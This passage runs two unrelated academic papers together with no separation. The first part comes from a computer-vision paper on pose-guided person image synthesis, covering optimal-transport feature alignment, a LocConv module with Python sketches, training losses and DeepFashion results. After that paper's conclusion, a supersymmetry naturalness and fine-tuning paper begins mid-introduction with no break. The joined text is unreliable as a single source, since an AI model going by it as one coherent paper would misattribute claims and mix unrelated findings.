\hat{f} = TP \cdot f, \hat{b} = TP \cdot b, TP \in \mathbb{R}^{HW \times HW}
\end{equation}
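For illustration, a balanced entropic Sinkhorn iteration produces a transport plan of the required shape; the paper uses an unbalanced variant, and this simplified sketch assumes uniform masses over positions:

```python
import numpy as np

def sinkhorn_plan(Fs, Fo, eps=0.05, n_iter=100):
    """Entropic OT plan between flattened feature maps (balanced Sinkhorn).

    Fs, Fo : (n, c) source / generated features, one row per spatial position
    Returns TP of shape (n, n).
    """
    n = Fs.shape[0]
    # cosine cost C_ij = 1 - <s_i, o_j> / (|s_i| |o_j|)
    Fs_n = Fs / np.linalg.norm(Fs, axis=1, keepdims=True)
    Fo_n = Fo / np.linalg.norm(Fo, axis=1, keepdims=True)
    C = 1.0 - Fs_n @ Fo_n.T
    K = np.exp(-C / eps)                 # Gibbs kernel
    a = b = np.full(n, 1.0 / n)          # uniform marginals (balanced case)
    u = np.ones(n)
    for _ in range(n_iter):              # alternating scaling updates
        v = b / (K.T @ u)
        u = a / (K @ v)
    return u[:, None] * K * v[None, :]
```

The aligned parameters then follow as $\hat f = TP \cdot f$ and $\hat b = TP \cdot b$, with $f$ and $b$ flattened over spatial positions.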
\subsubsection{LocConv for Structure Transfer}
Unlike the $1 \times 1$ kernel size adopted in conventional point-wise modulation (e.g., SPADE~\cite{park2019semantic}), the $k \times k$ square filter of LocConv allows for modulating the generation activations with the local structure in the neighborhood around point $l:(i,j)$ of the feature map $F_o$. We can then obtain the generation feature map $F_g$ by applying the aligned modulation filter $\hat{f}$ and bias $\hat{b}$ to $F_{o}$ in a spatially- and channel-varying way. The value of $F_g$ located at $l:(i,j)$ is defined as:
\begin{equation}
\begin{aligned}
F_g(l)&=\text {LocConv}(F_{o},l ; {\hat{f}}, \hat{b}) \\
&= \sum_{{F_{o}}(p) \in \mathcal{N}({F_{o}}(l))} \hat{f}_{p}\left(\frac{{F_{o}}(p)-\mu_{{F_{o}}}}{\sigma_{{F_{o}}}}\right)+\hat{b}_p
\end{aligned}
\end{equation}
where $\mu_{F_{o}}$ and $\sigma_{F_{o}}$ represent the channel-wise mean and standard deviation of the $F_{o}$. Finally we can get the $F_g$ by enumerating positions in $F_{o}$.
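An unvectorized sketch of LocConv under our own naming, with the per-position filters and biases assumed to be already aligned by the transport plan:

```python
import numpy as np

def loc_conv(F_o, f_hat, b_hat, k=3):
    """Spatially- and channel-varying modulation (LocConv sketch).

    F_o   : (C, H, W) generation feature map
    f_hat : (H, W, C, k*k) aligned per-position filters
    b_hat : (H, W, C) aligned per-position biases
    """
    C, H, W = F_o.shape
    mu = F_o.mean(axis=(1, 2), keepdims=True)        # channel-wise statistics
    sigma = F_o.std(axis=(1, 2), keepdims=True) + 1e-8
    Fn = (F_o - mu) / sigma                          # normalized features
    pad = k // 2
    Fp = np.pad(Fn, ((0, 0), (pad, pad), (pad, pad)))
    out = np.empty_like(F_o)
    for y in range(H):
        for x in range(W):
            patch = Fp[:, y:y + k, x:x + k].reshape(C, k * k)
            out[:, y, x] = (f_hat[y, x] * patch).sum(axis=1) + b_hat[y, x]
    return out
```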
\subsection{Learning Objectives}\label{loss}
The semantic prediction network is first trained with our proposed $\mathcal{L}_{\mathrm{S}_g}$. The whole network is then trained end-to-end with the source image ${I}_s$, the source pose ${P}_s$, and the target pose ${P}_t$ as inputs. We encourage the generated target-posed image ${I}_g$ to be close to the ground-truth target image ${I}_t$ at both the image and perceptual levels. Thus we introduce the following learning objectives to guide the training process.
\noindent\textbf{Pixel-wise Loss.} To generate sharper images, we use $\mathcal{L}_{L1}$ to measure the pixel-wise fidelity between the generated image ${I}_{g}$ and the ground truth $I_{t}$ in image pixel space.
\begin{equation}
\setlength{\abovedisplayskip}{4pt}
\setlength{\belowdisplayskip}{4pt}
\mathcal{L}_{L1} = ||{I}_{g}-I_{t}||_1,
\end{equation}
\noindent\textbf{Perceptual Loss.} Besides the pixel-wise loss, we also measure perceptual similarity in the VGG-19~\cite{simonyan2014very} feature space with a perceptual loss.
\begin{equation}
\setlength{\abovedisplayskip}{4pt}
\setlength{\belowdisplayskip}{4pt}
\mathcal{L}_{perc}=||\phi_k({I}_{g})-\phi_k(I_{t})||_2^2,
\end{equation}
{where $\phi_k$ represents the neuron response at the $k$-th layer extracted with a pretrained VGG-19 model.}\\
\noindent\textbf{Adversarial Loss.}
Owing to the great potential of GANs, we introduce the adversarial loss to encourage the generator to produce photo-realistic images in an adversarial manner. The training objective for the discriminator $D$ and generator $G$ is calculated as:
\begin{equation}
\setlength{\abovedisplayskip}{4pt}
\setlength{\belowdisplayskip}{4pt}
\begin{aligned}
\mathcal{L}_{adv}(G,D)=&\mathbb{E}_{I_{s},I_{t}}[\log(1-D(G(P_t,I_{s},{S}_{t} )|I_{s},P_t))]
\\+&\mathbb{E}_{I_{s},I_{t}}[\log D(I_{t}|I_{s},P_t)].
\end{aligned}
\end{equation}
\noindent\textbf{Overall loss function.} The final learning objective combines the above-mentioned losses and is defined as:
\begin{equation}
\setlength{\abovedisplayskip}{4pt}
\setlength{\belowdisplayskip}{4pt}
\mathcal{L}=\alpha_{S_g}\mathcal{L}_{S_g}+\alpha_{L1}\mathcal{L}_{L1}+\alpha_{perc}\mathcal{L}_{perc} + \alpha_{adv}\mathcal{L}_{adv},
\end{equation}
where $\alpha_{S_g}$, $\alpha_{L1}$, $\alpha_{perc}$, $\alpha_{adv}$ are the trade-off weights.
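As a rough sketch of how these terms combine, the snippet below evaluates the weighted objective on plain arrays. It is an illustration of the formulas, not the released training code: `phi` stands in for the frozen VGG-19 feature extractor at layer $k$, and the discriminator outputs are plain numbers in $(0,1)$.

```python
import numpy as np

def total_loss(I_g, I_t, phi, d_fake, d_real, loss_sg,
               a_sg=1.0, a_l1=1.0, a_perc=1.0, a_adv=1.0):
    """Weighted sum of the training objectives (illustrative helper).

    I_g, I_t       : generated / ground-truth images as arrays
    phi            : stand-in for the frozen VGG-19 feature extractor
    d_fake, d_real : discriminator outputs for generated / real images
    loss_sg        : precomputed semantic-prediction loss term
    """
    l_l1 = np.abs(I_g - I_t).sum()                 # pixel-wise L1
    l_perc = np.sum((phi(I_g) - phi(I_t)) ** 2)    # perceptual (squared L2)
    l_adv = np.log(1.0 - d_fake) + np.log(d_real)  # adversarial terms as written
    return a_sg * loss_sg + a_l1 * l_l1 + a_perc * l_perc + a_adv * l_adv
```

When the generated image matches the ground truth, the L1 and perceptual terms vanish and only the adversarial and semantic terms remain.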
\section{Experiments}\label{exp}
In this section, we first introduce implementation details, including the dataset and image quality evaluation metrics. We then perform extensive experiments to demonstrate the superiority of our model over prevalent methods and to verify its effectiveness.
\subsection{Implementation Details}
We select DeepFashion~\cite{liu2016deepfashion} to evaluate our method for its diversity of human identities and coverage of different clothes. The DeepFashion dataset contains 52712 high-resolution images showing various clothing styles and poses. All images are resized to $256\times176$, as adopted by many previous methods. Following the strategy of~\cite{ren2020deep}, we obtain image pairs and split them into 101966 for training and 8570 for testing without overlap. To measure the generated results from different aspects, we choose the Structural Similarity Index (SSIM) and Peak Signal-to-Noise Ratio (PSNR) for image-level similarity measurement, which are sensitive to low-level image quality. For perceptual evaluation, the Inception Score (IS) and Fréchet Inception Distance (FID) are introduced to calculate the feature-level and distribution-based distances between InceptionNet-encoded features.
\begin{figure*}[!t]
\centering
\includegraphics[width= 0.9\linewidth]{figs/comparison.pdf}
\caption{{Visual comparison with the competing methods on the DeepFashion dataset. Best viewed zoomed in on screen.}}
\label{fig:comparison}
\end{figure*}
\subsection{Qualitative Analysis}
Figure~\ref{fig:comparison} presents qualitative comparisons between several state-of-the-art methods and our model, demonstrating the superiority of our method in clothes structure recovery, photo-realistic texture rendering, and preservation of distinct person identities. LiquidGAN~\cite{liu2019liquid} generates distorted human images when accurate 3D human modeling is not available. Methods such as PoNA~\cite{li2020pona}, XingGAN~\cite{tang2020xinggan}, and GFLA~\cite{ren2020deep} tend to generate unreasonable textures for lack of semantic guidance. Besides, PISE~\cite{zhang2021pise} and SPGNet~\cite{lv2021learning} overlook the inter-region correlation and the distinction between occluded and non-occluded regions, resulting in visual artifacts such as cluttered textures in the occlusion estimation. Different from all of them, our model adaptively predicts the invisible regions through graph-based region style reasoning. As circled in Figure~\ref{fig:comparison}, our model maintains better shape consistency and generates more reasonable textures for invisible parts. Notably, benefiting from our Local Structure Transfer module, which models and transfers local characteristics, our model better preserves the hat structure, as shown in the last row of Figure~\ref{fig:comparison}.
\begin{table}
\setlength{\tabcolsep}{1.6mm}
\centering
\begin{tabular}{l|cccc}
\hline \multicolumn{1}{c|} { Methods } & FID $\downarrow$ & IS $\uparrow$ & SSIM $\uparrow$ & PSNR $\uparrow$ \\
\hline \hline LiquidGAN & $25.01$ & $\mathbf{3.56}$ & $0.613$ & $28.75$ \\
PoNA & $23.23$ & $3.33$ & $0.774$ & $31.34$ \\
XingGAN & $41.79$ & $3.23$ & $0.762$ & $31.08$ \\
GFLA & $14.52$ & $3.29$ & $0.649$ & $31.28$ \\
PISE & $\underline{13.61}$ & $3.41$ & $0.767$ & $\underline{31.38}$ \\
SPGNet & $14.75$ & $2.99$ & $\underline{0.775}$ & $31.24$ \\
GLocal(Ours) & $\mathbf{11.31}$ & $\underline{3.47}$ & $\mathbf{0.779}$ & $\mathbf{31.42}$ \\
\hline
\hline
w/o FL & $15.88$ & $3.46$ & $\mathbf{0.779}$ & $\mathbf{31.42}$ \\
w/o GGR & $17.39$ & $3.20$ & $0.769$ & $31.13$ \\
w/o LST & $16.93$ & $3.43$ & $\underline{0.775}$ & $31.28$ \\
\hline
\end{tabular}
\caption{Comparison with other state-of-the-art methods and variants on DeepFashion dataset. FID, IS, SSIM and PSNR are aforementioned metrics. $\uparrow$ and $\downarrow$ represent the higher the better and the lower the better. \textbf{Bold} and \underline{underlined} digits mean the best and the second best of each metric.}
\label{tab:comp}
\end{table}
\begin{figure}[!t]
\centering
\includegraphics[width= 1.0\linewidth]{figs/ablation.pdf}
\caption{{Visual comparison of the variants and our full model. Best viewed enlarged on screen.}}
\label{fig:ablation}
\end{figure}
\subsection{Quantitative Comparison}
We also compare state-of-the-art methods with our model by numerical evaluation. Among all the models, ours reaches the highest SSIM and PSNR scores, which indicates that our model best maintains low-level statistical consistency with real images. We further adopt deep metrics, including the FID and IS scores, to measure the high-level perceptual consistency between our generated images and real images. As shown in Table~\ref{tab:comp}, our model achieves the best FID, which clearly shows its advantage in preserving texture details. Besides, the IS score of our model surpasses most prevalent models, which means that our GLocal can generate images with better quality and realism.
\subsection{Ablation Study}
We have trained several variant models to examine the effectiveness of our important components.
\noindent\textbf{w/o Focal Loss (w/o FL).} This variant predicts the segmentation map with the vanilla multi-class cross-entropy loss.
\noindent\textbf{w/o Global Graph Reasoning (w/o GGR).} This variant removes the graph reasoning block and thus ignores the distinction between occluded and non-occluded areas.
\noindent\textbf{w/o Local Structure Transfer(w/o LST).} This variant removes the local structure transfer mechanism and simply takes the features processed by global graph reasoning as the decoder input to generate the final image.
\noindent\textbf{GLocal (Ours).} This is the full model of our method.
From the quantitative results shown in Table~\ref{tab:comp}, we can verify the improvement brought by our three components. Compared with the other variants, our full model outperforms them by a large margin in FID, which indicates that the cooperation of these components generates more photo-realistic images. Besides, our full model also achieves the leading performance with the best IS, SSIM, and PSNR scores, which means that it improves shape consistency, structure similarity, and pixel-level alignment with the real images. Intuitively, from the visual results in Figure~\ref{fig:ablation}, we can see that the focal loss helps achieve more accurate semantic prediction, since less occupied regions cannot be estimated under the \textbf{w/o FL} setting (e.g., the segmentation map predicted by w/o FL lacks the sheet region), which further leads to unrealistic texture rendering. The variants \textbf{w/o GGR} and \textbf{w/o LST} fail to infer the occluded regions and preserve the structure information, as depicted by the degraded textures circled in Figure~\ref{fig:ablation}.
\begin{figure}[!t]
\centering
\includegraphics[width=1.0\linewidth]{figs/application.pdf}
\caption{Texture inpainting application. We can perform image inpainting for missing regions by global graph reasoning in our GLocal model. The inputs are corrupted images masked with irregular or semantic masks; images in the red box denote the ground-truth images.}
\label{fig:application}
\end{figure}
\section{Application}
Our GLocal model can also be extended to texture inpainting by inferring the invisible regions in a corrupted source image. Given a source image in which part of the content is masked, the texture inpainting task reconstructs the source image by filling in the missing regions. The corrupted regions in texture inpainting can be regarded as the occluded regions in pose transfer, since both are invisible in the reference image. Based on this observation, we can utilize region-wise graph reasoning to reconstruct the original image by calculating the style latent codes of the existing areas and propagating the contextual style statistics into the missing regions. The choice of mask shape divides our application into the following two categories.
\noindent\textbf{Irregular region inpainting.} Irregular region inpainting produces the inpainted result from an input masked with irregular masks drawn from the Irregular Mask Dataset~\cite{liu2018image}. As shown in Figure~\ref{fig:application} (a), our method generates correct structure and consistent textures for irregular regions with visible texture.
\noindent\textbf{Semantic region inpainting.} For semantic region inpainting, we randomly remove the texture of specific semantic regions (e.g., hair, pants). From the visual results in Figure~\ref{fig:application} (b), our approach is capable of recovering the content and rendering reasonable semantics.
\section{Conclusion}
In this paper, we have presented a semantic-assisted person image generation framework to synthesize the target-posed source person or inpaint a corrupted image. Our approach models the semantic regions as a human skeleton-based graph and then infers the occluded target regions' styles with graph reasoning. To transfer the local structure from the source to the generation features, the local properties are learned with self-correlation, and globally-varying affine parameters are employed to modulate the generation activations. Extensive experiments and ablation studies have proven the superiority and effectiveness of our model.
Extensive searches of supersymmetric signals, done mostly but not only at LEP, have found
no positive result so far~\cite{pdg,vancouver}.
Nevertheless these results turn out to have interesting consequences,
because the typical spectrum of existing `conventional' supersymmetric models contains
some sparticle (a chargino, a neutralino or a slepton, depending on the model)
with a mass of a few times $10\,{\rm GeV}$.
How much should one worry about the fact that experimental bounds
require these particles to be heavier than $(80\div90)\,{\rm GeV}$?
A first attempt to answer this question has been made in~\cite{CEP},
using the fine tuning (`FT') parameter~\cite{FT} as a quantitative measure of naturalness.
After including some important one loop effects~\cite{V1loop,FTLEP}
that alleviate the problem,
in minimal supergravity the most recent bounds require a FT (defined as in~\cite{FTLEP})
greater than about 6~\cite{FTLEP,CEP2},
and a FT greater than about $20$ to reach values of $\tan\beta<2$.
Still it is not clear if having a FT larger than 6 is worryingly unnatural.
Setting an upper bound on the FT is a subjective choice.
The FT can be large in some cases where nothing unnatural happens
(e.g.\ dimensional transmutation)~\cite{FTcritica}.
Does a $Z$-boson mass with a strong dependence on the supersymmetric parameters
indicate a problem for supersymmetry (SUSY)?
The answer is yes: in this case the FT is related to naturalness, although in an indirect way~\cite{GMFT}.
Rather than discussing this kind of details,
in this paper we approach the naturalness problem in a more direct way.
When performing a generic random scanning of the SUSY parameters,
the density distribution of the final results has no particular meaning.
For this reason the sampling spectra that turn out to be experimentally excluded are usually dropped.
In order to clearly exhibit the naturalness problem, we make plots in which
{\em the sampling density is proportional to the naturalness probability}
(we will discuss its relation with a correctly defined `fine tuning' coefficient),
so that it is more probable to live in regions with higher density of sampling points.
Plotting together the experimentally excluded and the few still allowed points
we show in fig.s~\ref{fig:MassePallini}, \ref{fig:MasseCampane} in
a direct way how strong the bounds on supersymmetry are.
We find that
\begin{itemize}
\item
The minimal FT can be as low as 6, but such a relatively low FT is atypical:
the bounds on the chargino and higgs masses exclude
95\% of the MSSM parameter space with supersymmetry breaking mediated by
`minimal' or `unified' supergravity.
\item
LHC experiments will explore $90\%$ of the small remaining part of the parameter space
(we are assuming that it will be possible to discover coloured superparticles lighter than $2\,{\rm TeV}$).
\item The supersymmetric naturalness problem is more serious in gauge mediation models.
\end{itemize}
Some regions of the parameter space are more problematic:
\begin{itemize}
\item values of $\tan\beta$ lower than 2 (a range
suggested by an infra-red fixed-point analysis and by the $b/\tau$ unification);
\item values of $\tan\beta$ bigger than $20$ can naturally appear only in some particular situations,
but often imply a too large effect in $b\to s\gamma$.
\end{itemize}
Some particular and interesting scenario appears strongly disfavoured
\begin{itemize}
\item Gauge mediation models with low messenger mass $M_{\rm GM}\circa{<}10^7\,{\rm GeV}$;
\end{itemize}
or even too unnatural to be of physical interest
\begin{itemize}
\item Baryogenesis at the electroweak scale allowed by a sufficiently light stop.
\end{itemize}
These results are valid in `conventional' supersymmetric models.
It is maybe possible to avoid these conclusions by inventing appropriate models.
However, if one believes in weak scale supersymmetry and thinks that the naturalness problem
should receive a theoretical justification different from an unlikely numerical accident,
one obtains strong constraints on model building.
If instead supersymmetry has escaped experimental detection because
a numerical accident makes the sparticles heavier than the natural expectation,
we compute the naturalness distribution probability for supersymmetric signals in each given model.
There is a non negligible probability that
an accidental cancellation stronger than the `minimal' one
makes the sparticles heavier than $1\,{\rm TeV}$.
\medskip
In section~\ref{procedure} we outline and motivate the procedure that we adopt.
In section~\ref{masses} we show our results for the masses of supersymmetric particles.
In section~\ref{effects} we discuss the natural range of various interesting
supersymmetric loop effects.
Finally in section~\ref{fine} we give our conclusions and we discuss some implication
of the supersymmetric naturalness problem for model building.
In appendix~A we collect the present direct experimental bounds on supersymmetry in a compact form.
Since our formul\ae{} for supersymmetric effects in $B$-mixing correct previous ones
and include recently computed QCD corrections, we list them in appendix~B.
\section{The procedure}\label{procedure}
In this section we describe the sampling procedure we have used to make plots with density of points
proportional to their naturalness probability.
Within a given supersymmetric model (for example minimal supergravity)
we extract random values for the dimensionless ratios of its various supersymmetry-breaking
parameters.
We leave free the overall supersymmetric mass scale, that we call $m_{\rm SUSY}$.
For each choice of the random parameters we compute $v$ and $\tan\beta$
by minimizing the potential:
$m_{\rm SUSY}$ is thus fixed by imposing that $v$ (or $M_Z)$ gets its experimental value.
We can now compute all the masses and loop effects that we want to study,
and compare them with the experimental bounds.
This `Monte Carlo' procedure computes
how frequently numerical accidents can make the $Z$ boson
sufficiently lighter than the unobserved supersymmetric particles.
As discussed in the next subsection, in this way we obtain a sample of supersymmetric spectra with density
proportional to their naturalness probability.
In subsection~\ref{example} we illustrate these considerations with a simple example.
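Schematically, the scale-fixing step of this procedure can be sketched as follows: once the dimensionless ratios are drawn, minimizing the potential gives $M_Z^2$ proportional to $m_{\rm SUSY}^2$, and imposing the measured $M_Z$ then determines $m_{\rm SUSY}$. The toy version below is purely illustrative (the real condition involves the full one-loop potential):

```python
def fix_overall_scale(c, MZ=91.19):
    """Toy version of the scale-fixing step: suppose minimizing the
    potential gives MZ^2 = c(ratios) * mSUSY^2 for some dimensionless
    coefficient c fixed by the random ratios.  Imposing the measured
    MZ (in GeV) then determines the overall supersymmetric scale."""
    if c <= 0:
        # electroweak symmetry is not broken for these ratios
        raise ValueError("no electroweak symmetry breaking")
    return MZ / c ** 0.5
```

A small coefficient $c$, i.e.\ a strong accidental cancellation among the contributions, forces $m_{\rm SUSY}$ far above $M_Z$ — which is exactly the naturalness problem quantified in the next subsection.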
\subsection{Naturalness and fine tuning}
Our approach is related to previous work in this way:
for any given value of the dimensionless ratios
the naturalness probability given by the procedure outlined before is
inversely proportional to the
`fine tuning-like' parameter $\Delta$ defined in~\cite{GMFT},
that in the limit $\Delta\gg1$ reduces
to the original definition of the fine tuning parameter~\cite{FT}.
In a supersymmetric model the $Z$ boson mass, $M_Z^2(\wp)$, can be computed
as function of the parameters $\wp$ of the model,
by minimizing the potential.
A $Z$ boson much lighter than the supersymmetric particles
is obtained for certain values $\wp$ of the supersymmetric parameters,
but is characteristic of only a
small region $\Delta\wp$ of the parameter space.
Unless there is some reason that says that values in this particular range
are more likely than the other possible values,
there is a small probability --- proportional to the size $\Delta\wp$ of the
small allowed range ---
that supersymmetry has escaped experimental detection due to some unfortunate accident.
This naturalness probability is thus inversely proportional to the `fine-tuning-like' parameter
\begin{equation}\label{eq:Delta}
\Delta=\frac{\wp}{\Delta\wp}
\end{equation}
defined in~\cite{GMFT}.
As shown in~\cite{GMFT}, if $\Delta\wp$ is small, we can approximate $M_Z^2(\wp)$ with
a first order Taylor expansion around its experimental value,
finding $\Delta\wp \approx \wp/d[\wp]$
where $d$ coincides with the original definition of fine-tuning~\cite{FT}
\begin{equation}
d=\left|\frac{\wp}{M_Z^2}\frac{\partial M_Z^2}{\partial\wp}\right|.
\end{equation}
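Numerically, $d$ can be evaluated as a logarithmic derivative by finite differences; the quadratic toy model for $M_Z^2(\wp)$ below is purely illustrative and not a physical potential.

```python
def fine_tuning(MZ2, p, eps=1e-6):
    """Barbieri-Giudice coefficient d = |(p / MZ2(p)) dMZ2/dp|,
    evaluated with a central finite difference."""
    h = p * eps
    dMZ2 = (MZ2(p + h) - MZ2(p - h)) / (2 * h)
    return abs(p * dMZ2 / MZ2(p))
```

In a toy model $M_Z^2(\wp)=a-b\wp^2$, a point close to the cancellation $b\wp^2\to a$ gives a large $d$, while a generic point gives $d={\cal O}(1)$: the fine tuning grows as the cancellation becomes more delicate.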
This original definition of naturalness in terms of the logarithmic sensitivities of $M_Z$
has been criticized~\cite{FTcritica} as being too restrictive or altogether inadequate.
The definition\eq{Delta} avoids all the criticisms~\cite{FTcritica}.
\smallskip
To be more concrete, in the approximation that the $Z$ boson mass
is given by a sum of different supersymmetric contributions,
the previous discussion reduce to saying that there is an unnaturally small probability
$p\approx \Delta^{-1}$ that an accidental cancellations allows
a single `contribution' to
$M_Z^2$ be $\Delta$ time bigger than their sum, $M_Z^2$.
Beyond studying how naturally $M_Z$ is produced by the higgs potential,
we will study the natural expectation for various signals of supersymmetry.
Our procedure automatically weights as more unnatural particular situations
typical only of restricted ranges of the parameter space
that the ordinary `fine tuning' parameter does not recognise as more unnatural
(three examples of interesting more unnatural situations:
a cancellation between too large chargino and higgs contributions to $b\to s\gamma$;
an accidentally light stop;
a resonance that makes the neutralino annihilation cross section atypically large).
In the usual approach one needs to introduce extra fine-tuning coefficients
(that for example measure how strong is the dependence of
$\mathop{\rm BR}(b\to s\gamma)$, of the stop mass, of the neutralino relic density
on the model parameters)
to have a complete view of the situation.
\begin{figure}[t]
\begin{center}
\begin{picture}(9,5.4)
\putps(-0.5,0.2)(-0.5,0.2){example}{fexample.ps}
\put(3.4,0){$\wp=\mu/M_2$}
\end{picture}
\caption[SP]{\em The naturalness problem in a typical supersymmetric model.
We plot the chargino mass in GeV as function of $\mu/M_2$,
that is the only free parameter of the model under consideration.
Values of $\wp$ marked in gray are unphysical,
while \Orange light gray\special{color cmyk 0 0 0 1.}{} regions have too light sparticles.
Only the small white vertical band remain experimentally acceptable.
\label{fig:example}}
\end{center}\end{figure}
\subsection{An example}\label{example}
We now try to illustrate the previous discussions with a simple and characteristic example.
We consider the `most minimal' gauge mediation scenario with very heavy messengers
(one $5\oplus\bar{5}$ multiplet of the unified gauge group SU(5) with mass $M_{\rm GM}=10^{15}\,{\rm GeV}$).
`Most minimal' means that we assume that the unknown mechanism that generates the $\mu$-term
does not give additional contributions to the other parameters of the higgs potential.
Since the $B$ term vanishes at the messenger scale,
we obtain moderately large values of $\tan\beta\sim20$.
This model is a good example because its spectrum is not very different from
a typical supergravity spectrum,
and it is simple because it has only two free parameters:
the overall scale of gauge mediated soft terms and the $\mu$ term.
The condition of correct electroweak breaking fixes the overall mass scale,
and only one parameter remains free.
We choose it to be $\wp\equiv \mu/M_2$ (renormalized at low energy),
where $M_2$ is the mass term of the $\SU(2)_L$ gaugino.
In this model we can assume that $\mu$ and $M_2$ are real and positive without loss of generality.
In figure~\ref{example} we plot, as a function of $\wp$,
the lightest chargino mass in GeV\footnote{\special{color cmyk 0 0 0 1.}
We must mention one uninteresting technical detail since
figure~\ref{fig:example} could be misleading about it.
We are studying how frequently numerical accidents can make the $Z$ boson lighter than the sparticles.
We are {\em not\/} studying how frequently numerical accidents can make the sparticles heavier than the $Z$ bosons.
When including loop effects the two questions are not equivalent.
The first option, discussed in this paper because of physical interest,
gives sparticles naturally heavier than the second option.}.
The gray regions are excluded
because the electroweak gauge symmetry cannot be properly broken
if $\mu/M_2$ is too small or too large.
Values of $\wp$ shaded in \Orange light gray\special{color cmyk 0 0 0 1.}{}
are excluded because some supersymmetric particle is too light
(in this example the chargino gives the strongest bound).
The chargino is heavier than its LEP2 bound
only in a small range of the parameter space at $\wp\approx 2.3$ (left unshaded in fig.~\ref{fig:example})
close to the region where EW symmetry breaking is not possible
because $\mu$ is too large.
{\em The fact that the allowed regions are very small and atypical
is a naturalness problem for supersymmetry}.
Roughly $95\%$ of the possible values of $\wp$ are excluded
by the chargino mass bound.
In this example we have fixed $M_t^{\rm pole}=175\,{\rm GeV}$, and we have taken into account
the various one-loop corrections to the effective potential
(that double the size of the allowed parameter space).
In our example we have used a small value of the top quark Yukawa coupling at the unification scale,
$\lambda_t(M_{\rm GUT})\approx 0.45$, not close to its infrared fixed point
but compatible with the measured top mass.
In this way the large RGE corrections to the higgs masses are minimized.
This directly alleviates the naturalness problem;
moreover, since the $B$ term is only generated radiatively,
we also get a moderately large value of $\tan\beta\sim20$
that indirectly further alleviates the naturalness problem.
As a consequence the fine tuning corresponding to this example is $\Delta=6$,
the lowest possible value in unified supergravity and gauge mediation models.
In the next section we will study the naturalness problem in these motivated models.
To be conservative, up to section~\ref{effects} we will use only accelerator bounds, and we will not impose
the constraint on the $b\to s\gamma$ decay (and on other loop effects).
\begin{figure*}[t]
\begin{center}
\begin{picture}(17.7,5)
\putps(-0.5,0)(-0.5,0){scatter}{fMassePallini.ps}
\put(2.7,5.3){$\ref{fig:MassePallini}a$}
\put(8.5,5.3){$\ref{fig:MassePallini}b$}
\put(14.3,5.3){$\ref{fig:MassePallini}c$}
\end{picture}
\caption[SP]{\em Scatter plot with sampling density proportional to
the naturalness probability.
The areas shaded in \Orange light gray\special{color cmyk 0 0 0 1.}{} (\Peach dark gray\special{color cmyk 0 0 0 1.}) in fig.s~\ref{fig:MassePallini}a,b
correspond to regions
of each plane excluded at LEP2 (at LEP1), while
the area shaded in \Orange light gray\special{color cmyk 0 0 0 1.}{} in fig.~\ref{fig:MassePallini}c has been
excluded at Tevatron.
The \special{color cmyk 0 1. 1. 0.2} dark gray\special{color cmyk 0 0 0 1.}{} (black) points correspond to sampling spectra excluded at LEP2 (at LEP1).
Only the \Green light gray\special{color cmyk 0 0 0 1.}{} points in the unshaded area satisfy all the accelerator bounds.
Points with unbroken electroweak symmetry are not included in this analysis.
\label{fig:MassePallini}}
\end{center}\end{figure*}
\begin{figure*}[t]
\begin{center}
\begin{picture}(17,7.5)
\putps(0,0)(-2.5,0){MasseCampane}{fMasseCampane.ps}
\end{picture}
\caption[SP]{\em Naturalness distribution of sparticle masses
in minimal supergravity.
Allowed spectra contribute only with the small tails in \Green dark gray\special{color cmyk 0 0 0 1.}.
The remaining 95\% of the various bell-shaped distributions is given by points
excluded at LEP2 (in \special{color cmyk 0 1. 1. 0.2} medium gray\special{color cmyk 0 0 0 1.}) or at LEP1 (in \Orange light gray\special{color cmyk 0 0 0 1.}).
On the vertical axis of each plot the particle masses in GeV are reported
($\tan\beta$ in the first plot).
By `squark' and `slepton' we mean the lightest squark and slepton excluding the
third generation ones, which have weaker accelerator bounds.
\label{fig:MasseCampane}}
\end{center}\end{figure*}
\section{The supersymmetric naturalness problem}\label{masses}
In this section we discuss how serious is the supersymmetric naturalness problem
in the various different motivated scenarios of supersymmetry breaking.
We will not consider models with extra fields at low energy beyond the minimal ones present in the MSSM
and we will assume that `matter parity' (equivalent to $R$ parity) is conserved.
In all this section {\em we will consider as excluded only those spectra that violate the experimental
bounds coming from direct searches\/} at accelerators listed in appendix A.
We do not impose cosmological bounds (the addition of tiny $R$ parity violating couplings allows to remove
eventual problems of dark matter overabundance or of nucleosynthesis destruction);
we do not impose that the physical vacuum be the only (or the deepest) one~\cite{CCB,CCBcosm}
depending on cosmology the presence of extra unphysical minima can be or cannot be dangerous ---
within conventional cosmology (i.e.\ sufficiently hot universe, inflation)
the most frequent unphysical minima seem not dangerous~\cite{CCBcosm});
we do not impose $b/\tau$ unification or closeness of $\lambda_t$ to its infra-red fixed point
(these appealing assumptions give problems~\cite{CEP2,b/tau}
that can be alleviated by modifying the theory at very high energy or
by loop corrections at the electroweak scale);
and in this section we also do not impose any indirect bound
(because we want to be conservative and include only completely safe bounds ---
the indirect constraint from $\mathop{\rm BR}(B\to X_s \gamma)$ would exclude 20\% of the otherwise allowed points).
We are thus excluding spectra that are really excluded.
\subsection{Minimal supergravity}
``Minimal supergravity'' assumes that
all the sfermion mas\-ses have a common value $m_0$,
all the three gaugino masses have a common value $M_5$, and that
all the $A$-terms have a common value $A_0$
at the unification scale
$M_{\rm GUT}\approx2\cdot10^{16}\,{\rm GeV}$.
The parameters $\mu_0$ and $B_0$ are free.
They contribute to the mass terms of the higgs doublets
$h^{\rm u}$ and $h^{\rm d}$ in the following way:
$$
(m_{h^{\rm u}}^2+|\mu_0^2|)|h^{\rm u}|^2 +
(m_{h^{\rm d}}^2+|\mu_0^2|) |h^{\rm d}|^2+
(\mu_0 B_0 h^{\rm u} h^{\rm d}+\hbox{h.c.}).$$
As explained in the previous section we randomly fix the dimensionless ratios
of the parameters $m_0$, $M_5$, $A_0$, $B_0$ and $\mu_0$
and we fix the overall supersymmetric
mass scale ``$m_{\rm SUSY}$'' from the minimization condition of the MSSM potential.
More precisely we scan the parameters
within the following ranges
\begin{eqnsystem}{sys:range}
m_0&=&(\frac{1}{9}\div 3) m_{\rm SUSY}\label{eq:m0}\\
|\mu_0|,M_5&=&(\frac{1}{3}\div 3) m_{\rm SUSY}\label{eq:mu}\\
A_0,B_0&=&(-3\div 3) m_0
\end{eqnsystem}
The samplings in\eq{m0},\eq{mu} are done with flat density in logarithmic scale.
We believe we have chosen a reasonable restriction on the parameter space.
We could make the naturalness problem apparently more dramatic
by restricting the dimensionless ratios to a narrow region
that does not include some significant part of the experimentally allowed region,
or by extending the range to include larger values that produce a larger spread
in the spectrum so that it is more difficult to satisfy all the experimental bounds.
The only way to make the naturalness problem less dramatic is by imposing
appropriate correlations among the parameters, but this makes sense only if a theoretical justification can be found
for these relations. We will comment on this possibility in the conclusions.
